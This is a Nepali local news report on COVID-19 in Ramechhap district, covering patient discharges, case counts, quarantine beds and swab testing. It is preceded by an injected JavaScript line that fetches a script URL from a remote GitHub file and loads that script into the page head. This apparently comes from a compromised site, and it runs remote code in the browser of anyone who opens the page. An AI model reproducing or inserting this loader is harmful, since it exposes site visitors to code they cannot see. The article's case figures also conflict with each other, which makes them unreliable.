;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
कात्तिक ०३
रामेछाप । रामेछापको लिखु तामाकोशी गाउँपालिकामा रहेका २ कोरोना संक्रमितहरु डिस्चार्ज भएका छन् । सोमबार उनीहरु डिस्चार्ज भएका हुन् । जिल्ला अस्पताल रामेछापले जारी गर्ने नियमित प्रेस विज्ञप्ति मार्फत पालिकाका संक्रमित डिस्चार्ज भएको उल्लेख गरेको छ । उनीहरु दुबै जना पुरुष हुन् ।
त्यस्तै जिल्लामा आजसम्म कोरोना पोजेटिभ हुनेको संख्या १४२ जना पुगेको छ । रामेछाप घरभइ काठमाडौं लगाएतका ठाउँमा बस्दै आएकाहरुको पोजेटिभ हुनेको संख्या १४४ जना पुगेको छ । जसमा महिला ४२ र पुरुष १०२ रहेका छन् । हालसम्ममा १८४ जनाको स्वाब परिक्षणको रिपोर्ट आउन बाँकि रहेका छ ।
कोरोना भाइरस संक्रमणलाई लक्षित गरि हालसम्म रामेछाप जिल्लामा ४९० वेडको क्वारेन्टि तयार पारिएको छ । क्वारेन्टिनमा सोमबारसम्ममा ५ जना पुरुष रहेका छन् । त्यस्तै ६३ वेडको आइसोलेसन तयार पारिएको छ । हाल सम्ममा २ हजार २ सय ५५ जनाको स्वाब संकलन गरिएको छ । आजमात्रै १०८ जनाको स्वाब संकलन गरिएको छ । जिल्लामा संक्रमितको संख्या २ सय ८६ जना पुगेको छ ।
फेसबुक प्रतिक्रियाहरु